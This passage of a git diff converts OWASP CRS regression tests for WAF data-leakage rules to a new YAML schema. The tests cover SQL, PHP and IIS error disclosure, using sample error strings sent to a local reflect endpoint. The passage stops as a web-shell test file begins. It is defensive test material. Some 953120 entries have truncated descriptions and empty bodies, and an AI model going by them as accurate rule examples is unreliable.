/Volumes/Data/Users/username/Desktop/createXML.php on line 375"} - output: - log_contains: "id \"951220\"" - - - test_title: 951220-2 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + uri: "/reflect" + data: |- + {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: PHP Warning: mssql_query(): message: Incorrect syntax near 's'. (severity 15) in /Volumes/Data/Users/username/Desktop/createXML.php on line 375"} + output: + log: + expect_ids: [951220] + - test_id: 2 desc: "Matching mssql SQL Information Leakage" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - uri: "/reflect" - data: |- - {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: Conversion failed when converting the varchar value 'secret' to data type int."} - output: - log_contains: "id \"951220\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + uri: "/reflect" + data: |- + {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: Conversion failed when converting the varchar value 'secret' to data type int."} + output: + log: + expect_ids: [951220] diff --git a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951230.yaml b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951230.yaml index 972e41e9e..ee66a9da0 100644 --- a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951230.yaml +++ b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951230.yaml @@ -1,49 +1,47 @@ --- meta: author: "azurit, Xhoenix" - enabled: true - name: "951230.yaml" - description: "Regression tests for rule 951230" +rule_id: 951230 tests: - - test_title: 951230-1 + - test_id: 1 desc: "Matching MySQL SQL Information Leakage" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - uri: "/reflect" - data: |- - {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: ERROR 1772 (HY000): Malformed GTID set specification 'secret_password'."} - output: - log_contains: "id \"951230\"" - - test_title: 951230-2 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + uri: "/reflect" + data: |- + {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: ERROR 1772 (HY000): Malformed GTID set specification 'secret_password'."} + output: + log: + expect_ids: [951230] + - test_id: 2 desc: "Matching MySQL SQL Information Leakage" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - uri: "/reflect" - data: |- - {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: ERROR 1105 (HY000): XPATH syntax error: '\\secret'"} - output: - log_contains: "id \"951230\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + uri: "/reflect" + data: |- + {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: ERROR 1105 (HY000): XPATH syntax error: '\\secret'"} + output: + log: + expect_ids: [951230] diff --git a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951240.yaml b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951240.yaml index f878fd171..802915fd3 100644 --- a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951240.yaml +++ b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951240.yaml @@ -1,49 +1,47 @@ --- meta: author: "azurit, Xhoenix" - enabled: true - name: "951240.yaml" - description: "Regression tests for rule 951240" +rule_id: 951240 tests: - - test_title: 951240-1 + - test_id: 1 desc: "Matching PostgreSQL Information Leakage" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - uri: "/reflect" - data: |- - {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: Warning: pg_query(): supplied argument is not a valid PostgreSQL link resource in /var/www/sivusto/handler.php on line 56"} - output: - log_contains: "id \"951240\"" - - test_title: 951240-2 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + uri: "/reflect" + data: |- + {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: Warning: pg_query(): supplied argument is not a valid PostgreSQL link resource in /var/www/sivusto/handler.php on line 56"} + output: + log: + expect_ids: [951240] + - test_id: 2 desc: "Matching PostgreSQL Information Leakage" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - uri: "/reflect" - data: |- - {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: ERROR: invalid input syntax for integer"} - output: - log_contains: "id \"951240\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + uri: "/reflect" + data: |- + {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: ERROR: invalid input syntax for integer"} + output: + log: + expect_ids: [951240] diff --git a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951250.yaml b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951250.yaml index f711ff813..ebc1c439d 100644 --- a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951250.yaml +++ b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951250.yaml @@ -1,28 +1,26 @@ --- meta: author: "azurit" - enabled: true - name: "951250.yaml" - description: "Regression tests for rule 951250" +rule_id: 951250 tests: - - test_title: 951250-1 + - test_id: 1 desc: "Matching SQLite SQL Information Leakage" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - uri: "/reflect" - data: |- - {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: Warning: SQLite3::query() [sqlite3.query]: 1 values for 2 columns in /mysite/product.php on line 94"} - output: - log_contains: "id \"951250\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + uri: "/reflect" + data: |- + {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: Warning: SQLite3::query() [sqlite3.query]: 1 values for 2 columns in /mysite/product.php on line 94"} + output: + log: + expect_ids: [951250] diff --git a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951260.yaml b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951260.yaml index e8f93739f..852a60793 100644 --- a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951260.yaml +++ b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951260.yaml @@ -1,28 +1,26 @@ --- meta: author: "azurit" - enabled: true - name: "951260.yaml" - description: "Regression tests for rule 951260" +rule_id: 951260 tests: - - test_title: 951260-1 + - test_id: 1 desc: "Matching Sybase SQL Information Leakage" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - uri: "/reflect" - data: |- - {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: Warning: Sybase: Server message: Changed database context to 'rdhiman'. (severity 10, procedure N/A) in guestfatch.php on line 10"} - output: - log_contains: "id \"951260\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + uri: "/reflect" + data: |- + {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: Warning: Sybase: Server message: Changed database context to 'rdhiman'. (severity 10, procedure N/A) in guestfatch.php on line 10"} + output: + log: + expect_ids: [951260] diff --git a/tests/regression/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953100.yaml b/tests/regression/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953100.yaml index d4dfc5e5c..18149c32e 100644 --- a/tests/regression/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953100.yaml +++ b/tests/regression/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953100.yaml @@ -1,107 +1,105 @@ --- meta: author: "M4tteoP, Esad Cetiner, azurit" - enabled: true - name: "953100.yaml" - description: "Tests for rule 953100" +rule_id: 953100 tests: - - test_title: 953100-1 + - test_id: 1 desc: "'File size is' leads to FPs, it should not match at PL1" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - uri: "/post" - data: "Maximum allowed file size is 10 MB" - output: - no_log_contains: id "953100" - - test_title: 953100-2 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + uri: "/post" + data: "Maximum allowed file size is 10 MB" + output: + log: + no_expect_ids: [953100] + - test_id: 2 desc: "'Invalid date' Wordpress FP, it should not match at PL1" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - uri: "/post" - data: "Invalid date selected" - output: - no_log_contains: id "953100" - - test_title: 953100-3 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + uri: "/post" + data: "Invalid date selected" + output: + log: + no_expect_ids: [953100] + - test_id: 3 desc: "'The function' might lead to FPs, it should not match at PL1" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - uri: "/post" - data: "please review the function" - output: - no_log_contains: id "953100" - - test_title: 953100-4 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + uri: "/post" + data: "please review the function" + output: + log: + no_expect_ids: [953100] + - test_id: 4 desc: "'Static function' might lead to FPs, it should not match at PL1" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - uri: "/post" - data: "This is a static function" - output: - no_log_contains: id "953100" - - test_title: 953100-5 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + uri: "/post" + data: "This is a static function" + output: + log: + no_expect_ids: [953100] + - test_id: 5 desc: "'cannot be empty is too common for PL1 GH isue #3399" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - uri: "/post" - data: "Field cannot be empty." - output: - no_log_contains: id "953100" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + uri: "/post" + data: "Field cannot be empty." + output: + log: + no_expect_ids: [953100] diff --git a/tests/regression/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953101.yaml b/tests/regression/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953101.yaml index 57a366f04..abb4ceb62 100644 --- a/tests/regression/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953101.yaml +++ b/tests/regression/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953101.yaml @@ -1,112 +1,110 @@ --- meta: author: "M4tteoP, Esad Cetiner, azurit" - enabled: true - name: "953101.yaml" - description: "Tests for rule 953101" +rule_id: 953101 tests: - - test_title: 953101-1 + - test_id: 1 desc: "'File size is' leads to FPs at PL1, it should match at PL2" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - uri: "/reflect" - data: |- - {"body": "Maximum allowed file size is 10 MB"} - output: - log_contains: id "953101" - - test_title: 953101-2 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + uri: "/reflect" + data: |- + {"body": "Maximum allowed file size is 10 MB"} + output: + log: + expect_ids: [953101] + - test_id: 2 desc: "'Invalid date' leads to FPs at PL1, it should match at PL2" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - uri: "/reflect" - data: |- - {"body": "Invalid date selected"} - output: - log_contains: id "953101" - - test_title: 953101-3 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + uri: "/reflect" + data: |- + {"body": "Invalid date selected"} + output: + log: + expect_ids: [953101] + - test_id: 3 desc: "'The function' might lead to FPs at PL1, it should match at PL2" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - uri: "/reflect" - data: |- - {"body": "Please review the function"} - output: - log_contains: id "953101" - - test_title: 953101-4 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + uri: "/reflect" + data: |- + {"body": "Please review the function"} + output: + log: + expect_ids: [953101] + - test_id: 4 desc: "'Static function' might lead to FPs at PL1, it should match at PL2" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - uri: "/reflect" - data: |- - {"body": "This is a static function"} - output: - log_contains: id "953101" - - test_title: 953101-5 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + uri: "/reflect" + data: |- + {"body": "This is a static function"} + output: + log: + expect_ids: [953101] + - test_id: 5 desc: "'cannot be empty is too common for PL1, it should match at PL2 GH isue #3399" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - uri: "/reflect" - data: |- - {"body": "cannot be empty."} - output: - log_contains: id "953101" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + uri: "/reflect" + data: |- + {"body": "cannot be empty."} + output: + log: + expect_ids: [953101] diff --git a/tests/regression/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953120.yaml b/tests/regression/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953120.yaml index 23d215a47..ddcfda844 100644 --- a/tests/regression/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953120.yaml +++ b/tests/regression/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953120.yaml @@ -1,151 +1,149 @@ --- meta: author: "fzipi, azurit" - enabled: true - name: "953120.yaml" - description: "Positive tests for rule 953120" +rule_id: 953120 tests: - - test_title: 953120-1 + - test_id: 1 desc: "Just something that returns \"}" - output: - log_contains: "id \"953120\"" - - test_title: 953120-2 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + uri: "/reflect" + data: "{\"body\": \"\"}" + output: + log: + expect_ids: [953120] + - test_id: 2 desc: "Negative test, returns \"}" - output: - log_contains: "id \"953120\"" - - test_title: 953120-6 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + uri: "/reflect" + data: "{\"body\": \"\"}" + output: + log: + expect_ids: [953120] + - test_id: 6 desc: "Negative test, returns \"}" - output: - log_contains: "id \"953120\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "*/*" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + uri: "/reflect" + data: "{\"body\": \"\"}" + output: + log: + expect_ids: [953120] diff --git a/tests/regression/tests/RESPONSE-954-DATA-LEAKAGES-IIS/954100.yaml b/tests/regression/tests/RESPONSE-954-DATA-LEAKAGES-IIS/954100.yaml index 4631f2c6f..fb954c0ef 100644 --- a/tests/regression/tests/RESPONSE-954-DATA-LEAKAGES-IIS/954100.yaml +++ b/tests/regression/tests/RESPONSE-954-DATA-LEAKAGES-IIS/954100.yaml @@ -1,25 +1,23 @@ --- meta: author: "Andrew Howe" - enabled: true - name: "954100.yaml" - description: "Tests for rule 954100" +rule_id: 954100 tests: - - test_title: 954100-1 + - test_id: 1 desc: 'Returns C:\inetpub in the response body' stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - uri: "/reflect" - data: "{\"body\": \"C:\\\\inetpub \\n\"}" - output: - log_contains: "id \"954100\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + uri: "/reflect" + data: "{\"body\": \"C:\\\\inetpub \\n\"}" + output: + log: + expect_ids: [954100] diff --git a/tests/regression/tests/RESPONSE-954-DATA-LEAKAGES-IIS/954120.yaml b/tests/regression/tests/RESPONSE-954-DATA-LEAKAGES-IIS/954120.yaml index c57700a45..f13c4f303 100644 --- a/tests/regression/tests/RESPONSE-954-DATA-LEAKAGES-IIS/954120.yaml +++ b/tests/regression/tests/RESPONSE-954-DATA-LEAKAGES-IIS/954120.yaml @@ -1,45 +1,44 @@ --- meta: author: "Felipe Zipitria, azurit" - enabled: true - name: "954120.yaml" - description: "Tests for rule 954120 - IIS Error information disclusure" + description: "IIS Error information disclusure" +rule_id: 954120 tests: - - test_title: 954120-1 + - test_id: 1 desc: 'Match IIS error page' stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.1" - uri: "/reflect" - data: |- - {"body": "text=404.14 - URL too long."} - output: - log_contains: id "954120" - - test_title: 954120-2 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.1" + uri: "/reflect" + data: |- + {"body": "text=404.14 - URL too long."} + output: + log: + expect_ids: [954120] + - test_id: 2 desc: 'Match IIS error page' stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.1" - uri: "/reflect" - data: |- - {"body": "text=500.15 - Server error: Direct requests for GLOBAL.ASA are not allowed."} - output: - log_contains: id "954120" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.1" + uri: "/reflect" + data: |- + {"body": "text=500.15 - Server error: Direct requests for GLOBAL.ASA are not allowed."} + output: + log: + expect_ids: [954120] diff --git a/tests/regression/tests/RESPONSE-955-WEB-SHELLS/955100.yaml b/tests/regression/tests/RESPONSE-955-WEB-SHELLS/955100.yaml index 52e743d0b..eb0f78400 100644 --- a/tests/regression/tests/RESPONSE-955-WEB-SHELLS/955100.yaml +++ b/tests/regression/tests/RESPONSE-955-WEB-SHELLS/955100.yaml @@ -1,70 +1,68 @@ --- meta: author: "azurit" - enabled: true - name: "955100.yaml" - description: "Regression tests for rule 955100" +rule_id: 955100 tests: - - test_title: 